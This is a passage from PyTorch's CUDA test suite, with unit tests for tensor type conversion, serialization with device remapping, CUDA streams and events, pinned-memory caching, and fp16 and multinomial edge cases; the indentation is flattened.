x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of parent and child threads execution time is greater than the
# real execution time by least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used to soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
